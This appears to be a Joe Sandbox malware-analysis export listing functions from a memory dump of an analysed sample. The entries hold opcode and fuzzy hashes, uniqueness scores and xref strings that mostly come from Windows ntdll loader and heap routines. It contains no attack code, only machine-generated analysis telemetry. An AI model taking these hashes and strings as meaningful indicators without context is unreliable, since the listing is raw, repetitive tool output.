• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
• Opcode ID: 9aed79fc4990dcbb1a933a09e5dff1004807c93646d787745edf7fe44fedb1f5
• Instruction ID: f2f001cf19df3779a77e2a0cbeb61a86d4d3a88ab4032195b80dbd34c1ca96e6
• Opcode Fuzzy Hash: 9aed79fc4990dcbb1a933a09e5dff1004807c93646d787745edf7fe44fedb1f5
• Instruction Fuzzy Hash: 7171C1B1908305AFDB21DF18C988F9B7FA8AF95764F00046CFA489B246D775D588CBD2
Uniqueness

Uniqueness Score: -1.00%

Strings
• minkernel\ntdll\ldrinit.c, xrefs: 01A5A9A2
• apphelp.dll, xrefs: 01A12462
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A5A992
• LdrpDynamicShimModule, xrefs: 01A5A998
Memory Dump Source
• Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
                                                                                                                    • Opcode ID: 4e67efe64f6754a1217c83f697f023f84746730de6e159e42efdb053d79ab05b
                                                                                                                    • Instruction ID: 7108ac83f427f3b0af99fb6f8bf9b5b9325bdb359b8455ac3dd20f8eda17bae4
                                                                                                                    • Opcode Fuzzy Hash: 4e67efe64f6754a1217c83f697f023f84746730de6e159e42efdb053d79ab05b
                                                                                                                    • Instruction Fuzzy Hash: 36314A79B40202EBDF32DF5DD845AAA7BF5FF84714F154159E904AB249C7709842C780
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 01A0327D
                                                                                                                    • HEAP: , xrefs: 01A03264
                                                                                                                    • HEAP[%wZ]: , xrefs: 01A03255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                    • API String ID: 0-617086771
                                                                                                                    • Opcode ID: 793106b9078d6171eb7ee73ff9d53cc3a5e5fc57e69194cad9746a11b45f75e3
                                                                                                                    • Instruction ID: fc20c3d2dbbd5c99fa4c6fc6c33acb6ee4bfdf456f243798e6e9747f805f1124
                                                                                                                    • Opcode Fuzzy Hash: 793106b9078d6171eb7ee73ff9d53cc3a5e5fc57e69194cad9746a11b45f75e3
                                                                                                                    • Instruction Fuzzy Hash: E892DD70A042499FDF26CF68E4447AEBBF1FF48300F18806AE959AB392D735A945CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-4253913091
                                                                                                                    • Opcode ID: eb2867e324259584fc81c855e1ae6151a9b6415d03cc8fc3b7ce79e0a9f74e1c
                                                                                                                    • Instruction ID: 6ed1aa7e4404ed6ff785dc5e65b5230035cf4a1c29d5c24fc35ed7767744a18c
                                                                                                                    • Opcode Fuzzy Hash: eb2867e324259584fc81c855e1ae6151a9b6415d03cc8fc3b7ce79e0a9f74e1c
                                                                                                                    • Instruction Fuzzy Hash: E7F1AD30A04606DFEB16CF68DA94B6ABBF5FF44344F148168E816DB382D734E981CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: $@
                                                                                                                    • API String ID: 2994545307-1077428164
                                                                                                                    • Opcode ID: f3943c21e5a9af0ec6c09d0d8ff0d5999e10c45b8a7831aa3bdb99afc8a7b5a3
                                                                                                                    • Instruction ID: 49f46495304b3ffd302a86136c5bac572ae4748f44e396b6c0e74ba73ab1b8d8
                                                                                                                    • Opcode Fuzzy Hash: f3943c21e5a9af0ec6c09d0d8ff0d5999e10c45b8a7831aa3bdb99afc8a7b5a3
                                                                                                                    • Instruction Fuzzy Hash: 27C2B0716083419FDB65CF68C880BABBBE5BF88714F08992DF989C7249D774D805CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                    • API String ID: 0-2779062949
                                                                                                                    • Opcode ID: a765d41a4a81ec2985b5b925b650c71865fb78631cf0a91c61e56f2d3c41fe11
                                                                                                                    • Instruction ID: 86aa739cff8b10fa0fbc068c30ca26751ea8cc63f798813c2115f980f5ac0742
                                                                                                                    • Opcode Fuzzy Hash: a765d41a4a81ec2985b5b925b650c71865fb78631cf0a91c61e56f2d3c41fe11
                                                                                                                    • Instruction Fuzzy Hash: B0A171759116299BDB31DF68CD88BEAB7B8EF88710F1001EAE90CA7250D7359E85CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • Failed to allocated memory for shimmed module list, xrefs: 01A5A10F
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A5A121
                                                                                                                    • LdrpCheckModule, xrefs: 01A5A117
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-161242083
                                                                                                                    • Opcode ID: c6bf3a10483e2e91a381445ec4e37353950e0181083c7cc1ec58fe4b6f0069bd
                                                                                                                    • Instruction ID: d8ee6a07fd0229750a036947f113ddf32f3cf41c89ede02f1184f33294cf98b8
                                                                                                                    • Opcode Fuzzy Hash: c6bf3a10483e2e91a381445ec4e37353950e0181083c7cc1ec58fe4b6f0069bd
                                                                                                                    • Instruction Fuzzy Hash: 5471C075A003059FDB25DF68CA80ABEB7F4FB88704F18446DE906DB255E734AD82CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                    • API String ID: 0-1334570610
                                                                                                                    • Opcode ID: 10606b29b5dbf8b05db5e9f3c2e7d323f41b7f8e73aaa59485c460cc417404bd
                                                                                                                    • Instruction ID: 035f0f69c06b2ae3a7b6b747272dc234bf699eb5bdf261ac6be478a264732641
                                                                                                                    • Opcode Fuzzy Hash: 10606b29b5dbf8b05db5e9f3c2e7d323f41b7f8e73aaa59485c460cc417404bd
                                                                                                                    • Instruction Fuzzy Hash: 4161D170A04701DFDB2ACF28D680B6ABBF1FF45754F188569E8598F292C770E881CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A682E8
                                                                                                                    • Failed to reallocate the system dirs string !, xrefs: 01A682D7
                                                                                                                    • LdrpInitializePerUserWindowsDirectory, xrefs: 01A682DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                    • API String ID: 0-1783798831
                                                                                                                    • Opcode ID: afc21dbc3f53f51e479bafed5276a89d3d7b474089a4bccedcca7f2df3e51b27
                                                                                                                    • Instruction ID: 96b56ab6a53ad633fdc44e84e14bcecb287e76d99fa2d4dd46dafe4f3cb37fa8
                                                                                                                    • Opcode Fuzzy Hash: afc21dbc3f53f51e479bafed5276a89d3d7b474089a4bccedcca7f2df3e51b27
                                                                                                                    • Instruction Fuzzy Hash: 7E4121B5550311ABCB31EB78DD44B5B77E8AF98B60F00492AF948DB294E774D801CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01AAC1C5
                                                                                                                    • @, xrefs: 01AAC1F1
                                                                                                                    • PreferredUILanguages, xrefs: 01AAC212
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                    • API String ID: 0-2968386058
                                                                                                                    • Opcode ID: 241ec696355ab77e6df9b316d1c7128e1929da2a4babaf706d92416e73337a9c
                                                                                                                    • Instruction ID: 474726d50e6d0171dee31dbbda0b28d5c1cc84f22c9a845c2f5a4de65beb5fb3
                                                                                                                    • Opcode Fuzzy Hash: 241ec696355ab77e6df9b316d1c7128e1929da2a4babaf706d92416e73337a9c
                                                                                                                    • Instruction Fuzzy Hash: AF417471E00209EBEF11EFD8C851FEEBBB8AB54710F54406AE609F7244D7749A48CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                    • API String ID: 0-1373925480
                                                                                                                    • Opcode ID: ef85d780fe457d0d342314e3055545ba16412cc1ede7a7ae0fb2082c60456f25
                                                                                                                    • Instruction ID: 8f93db93c8a751e60ab57a300951d88369cdd6a00eba21aaaa283c2ac530303f
                                                                                                                    • Opcode Fuzzy Hash: ef85d780fe457d0d342314e3055545ba16412cc1ede7a7ae0fb2082c60456f25
                                                                                                                    • Instruction Fuzzy Hash: E641F771A0475ACFEB26EBE9C944BADBBB4FF69340F14045AD901EB791E7348901CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • LdrpCheckRedirection, xrefs: 01A7488F
                                                                                                                    • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A74888
                                                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01A74899
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                    • API String ID: 0-3154609507
                                                                                                                    • Opcode ID: fc8a73f385cb4dd96cf262de7384c631e53491b0b2b91ef9691f39da01b9ee23
                                                                                                                    • Instruction ID: 0f9419995fd23377b4acd98edee126d7bcb17c7968b487a2339454b8c6e7aad8
                                                                                                                    • Opcode Fuzzy Hash: fc8a73f385cb4dd96cf262de7384c631e53491b0b2b91ef9691f39da01b9ee23
                                                                                                                    • Instruction Fuzzy Hash: B141AF76A047559BCB22CF6CDD40A26BBE4AF8DA50F09056DED999B211D730DA00CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                    Strings
                                                                                                                    • LdrpInitializationFailure, xrefs: 01A720FA
                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01A72104
                                                                                                                    • Process initialization failed with status 0x%08lx, xrefs: 01A720F3
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: #%u
                                                                                                                    Strings
                                                                                                                    • LdrResSearchResource Enter, xrefs: 019FAA13
                                                                                                                    • LdrResSearchResource Exit, xrefs: 019FAA25
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: `$`
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Legacy$UEFI
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$MUI
                                                                                                                    Strings
                                                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019F063D
                                                                                                                    • kLsE, xrefs: 019F0540
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                    Strings
                                                                                                                    • RtlpResUltimateFallbackInfo Enter, xrefs: 019FA2FB
                                                                                                                    • RtlpResUltimateFallbackInfo Exit, xrefs: 019FA309
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: MUI
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: GlobalTags
                                                                                                                    • API String ID: 0-1106856819
                                                                                                                    • Opcode ID: 3a28c67d2b25bc90af99c54d1c6c47a0587bd6c1176810ee83b1dfe45bfff000
                                                                                                                    • Instruction ID: 3c3f400fcf1c503e64e8ed6eb56dce70e6ed2c29172227c2f9a7e3808d873d20
                                                                                                                    • Opcode Fuzzy Hash: 3a28c67d2b25bc90af99c54d1c6c47a0587bd6c1176810ee83b1dfe45bfff000
                                                                                                                    • Instruction Fuzzy Hash: 7671AEB5E0021ADFDF29CFACD5906ADBBB5BF98700F14812EE909A7241E7349941CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .mui
                                                                                                                    • API String ID: 0-1199573805
                                                                                                                    • Opcode ID: ea1c3b79826364178b508712d2fb4e9a31fec0bebfecbd9ab411b06bffe01c67
                                                                                                                    • Instruction ID: 75f2bba6c0c6cf2c80cee43a918adc3ad7bd309e9d2747c1b8deaa669b2da33d
                                                                                                                    • Opcode Fuzzy Hash: ea1c3b79826364178b508712d2fb4e9a31fec0bebfecbd9ab411b06bffe01c67
                                                                                                                    • Instruction Fuzzy Hash: A5519572D002299BDF11DF99DA40AAEBBF4BF5DB10F054129EA15B7250D7389C42CBE4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: EXT-
                                                                                                                    • API String ID: 0-1948896318
                                                                                                                    • Opcode ID: c79b829edc3a98f8582cc527a48e6cd7e8faf879d20e6a42f08edf60bac3f391
                                                                                                                    • Instruction ID: 53622ebb838ad9235ea08b18f56b9bf8badfec3d192e3a41cbbc5b92e1420062
                                                                                                                    • Opcode Fuzzy Hash: c79b829edc3a98f8582cc527a48e6cd7e8faf879d20e6a42f08edf60bac3f391
                                                                                                                    • Instruction Fuzzy Hash: 8E4160726083429BD722DB75EA80B6BB7E8AF88714F440D2DFA84D7180E674D9049797
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryHash
                                                                                                                    • API String ID: 0-2202222882
                                                                                                                    • Opcode ID: 250bc5d7210bbf63b3b462134af9e89a8bdd54229e9f5bb85c35e54dd58eb7d9
                                                                                                                    • Instruction ID: 382e3ed0df34490d33b9a617ee6f4050c85137bfd3545a2e608d8d347779575d
                                                                                                                    • Opcode Fuzzy Hash: 250bc5d7210bbf63b3b462134af9e89a8bdd54229e9f5bb85c35e54dd58eb7d9
                                                                                                                    • Instruction Fuzzy Hash: EB4175B1D0012DAFDB21DB50DD84FDEB77CAB55724F0045A5EB48AB140DB709E898FA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 0-1885708031
                                                                                                                    • Opcode ID: 744ffe47e2b4d5a918145ada92640cb1fd06b8d8a473633664479a09b8ca9b66
                                                                                                                    • Instruction ID: 56b828e54e98e52c98f8e328c6766251ebc5d528d06402a50560eee85917f16f
                                                                                                                    • Opcode Fuzzy Hash: 744ffe47e2b4d5a918145ada92640cb1fd06b8d8a473633664479a09b8ca9b66
                                                                                                                    • Instruction Fuzzy Hash: DE310771E007199BFB22EF69C954BFEBBB8EF45704F144028E949AB282D775D805CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: BinaryName
                                                                                                                    • API String ID: 0-215506332
                                                                                                                    • Opcode ID: e9015643e412ba19cc88f7ab28f31b9a9f6de53a10bbf8c0c596ee31c735b7b4
                                                                                                                    • Instruction ID: bfbe36446c45231c9a822b02128ed22bb4751cbed42c2480048fb7ea35e12f35
                                                                                                                    • Opcode Fuzzy Hash: e9015643e412ba19cc88f7ab28f31b9a9f6de53a10bbf8c0c596ee31c735b7b4
                                                                                                                    • Instruction Fuzzy Hash: 0031F576900519AFEB16DF59C945E7FBB78EF80730F018129E945A7294D7309E04DBE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 01A7895E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                    • API String ID: 0-702105204
                                                                                                                    • Opcode ID: 383d6c199d1e5679988b7eca717b2b332dcde979b3a64b85b0c41eac49108394
                                                                                                                    • Instruction ID: 02d07f92a64054cefe9051698f6ac9b79fd31feae3761f0c4f40c952da8faa7a
                                                                                                                    • Opcode Fuzzy Hash: 383d6c199d1e5679988b7eca717b2b332dcde979b3a64b85b0c41eac49108394
                                                                                                                    • Instruction Fuzzy Hash: B601263A300302ABE6216B5AEC8CE6B7FE5EFC1668F08002DF6458B551CB34AD41C793
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9afb1d3b922b2f4e215223290096ac3857d1869fc347c23090ff187cc5c265c0
                                                                                                                    • Instruction ID: ef74a64a025df6376c5fd32dc29550ee8e9a80be2a1fdacdd7c4854df0ddad30
                                                                                                                    • Opcode Fuzzy Hash: 9afb1d3b922b2f4e215223290096ac3857d1869fc347c23090ff187cc5c265c0
                                                                                                                    • Instruction Fuzzy Hash: 6842B575608341ABDF26CF68C990B6FBBE5AFC8300F18492EFA8597250D771D885CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a39c7efedd643d103598b91b5ffa75bfb35c14539eccebcf3759ace7c14b010
                                                                                                                    • Instruction ID: 24080dbe4f8fd988860150c02762c2da0633a09a87ed072affc95ae5fb61bf71
                                                                                                                    • Opcode Fuzzy Hash: 9a39c7efedd643d103598b91b5ffa75bfb35c14539eccebcf3759ace7c14b010
                                                                                                                    • Instruction Fuzzy Hash: 62426F75E102198FEB25DF69C841BADBBF5BF48300F588099E949EB242DB389D85CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a2137bd8a5025c80b403850f9fe5afd7ea6a17284907dac0084a9fe014ade6e
                                                                                                                    • Instruction ID: 61bf8f03f418825ff939abccf193e83df9d57269b7ac4d40b5a1252a5ffedad5
                                                                                                                    • Opcode Fuzzy Hash: 2a2137bd8a5025c80b403850f9fe5afd7ea6a17284907dac0084a9fe014ade6e
                                                                                                                    • Instruction Fuzzy Hash: DE323170A087558FEB66CF69C9447BEBBF2BF84304F54411ED88A9B685D734A802CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a01abe8b6d2b88053ac630f8e4cacf8fce925ef2d6946a346760328134bbc14
                                                                                                                    • Instruction ID: 49f62c17dae1bf1b978e4c532c215e5caaaf12afa99827879fe37a2bf54d03c8
                                                                                                                    • Opcode Fuzzy Hash: 3a01abe8b6d2b88053ac630f8e4cacf8fce925ef2d6946a346760328134bbc14
                                                                                                                    • Instruction Fuzzy Hash: 16229D742046618BEF25CF2DC095376BBF1AF85304F18849BDA968F286E735E4D2DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cca624635e30dd00405854e993111125fb30253a413c2f2373babc1d9dbbd821
                                                                                                                    • Instruction ID: 047bc2fa46280e66e695ceec44ef19dbcd98f257a1c45f460626ac7428c922ab
